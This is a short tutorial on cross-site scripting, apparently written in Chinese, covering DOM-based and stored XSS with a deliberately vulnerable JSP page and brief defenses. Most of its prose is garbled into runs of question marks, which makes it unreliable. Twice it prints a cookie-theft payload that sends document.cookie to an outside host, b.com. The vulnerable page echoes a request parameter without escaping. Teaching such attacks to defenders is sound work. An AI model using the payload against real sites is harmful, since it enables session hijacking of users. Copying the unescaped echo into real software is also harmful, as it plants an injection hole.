????XSS???CSS?????Cross SiteScript????????????????Web?????г??????????XSS??????????????????????????????????????????Σ?????????????????????XSS??????????????(????)?????HTML???????????????????????????HTML??????????У?????????????????磬??????Cookie??????????????????????????
????XSS????
????XSS??????????SQL???????????????????????????????XSS??????????XSS????????????????DOM Based XSS????????????Stored XSS???????????????п??????????ж???????????д??????????????XSS??????????Σ??????????????????????????????????????script??
????DOM Based XSS
????DOM Based XSS???????????DOM??????????ù???????????е????????????
???????????
??????????a.com???????????????Щ?????????url?е??????content??????????????2???????洦??????????????????????????

 

<%@ page language="java"contentType="text/html; charset=UTF-8"pageEncoding="UTF-8"%>
<!DOCTYPEhtmlPUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>XSS????</title>
</head>
<body>
????????<%=request.getParameter("content")%>
</body>
</html>

???????????Tom?????????????????????????????(????????????????????????)?????????????????????????????????http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>????Tom??????????????(????????????a.com)?????????????b.com???????Tom??a.com?е?cookie????????b.com??b.com???????????????????????????????????????Tom??a.com??cookie?????cookie????п?????е???????????????????????У?????????Tom?????????????????????a.com?content=<script>alert(“xss”)</script>?????????????????????У???????????????????xss????????????????????????????ι????????????????
????Stored XSS
????Stored XSS??洢?XSS??????????乥??????????洢???????????????????У?????????????????
????????????
????a.com????????£?????????a.com?з??????????£??????а???????????<script>window.open(“www.b.com?param=”+document.cookie)</script>??????????????Tom??Jack????????????????£????????????????????????????cookie????????????????????????????????????????У?????????????
????Stored XSS???Σ???????Σ???????
????XSS????
???????????????ì????????У???ì?ж?????????????в????????????????????????????????????з?????XSS?????????·????
???????????????
??????????????????????????????????????д?????????????????????????????????
????Html encode
?????????Щ????£??????????????????????????????????????????????????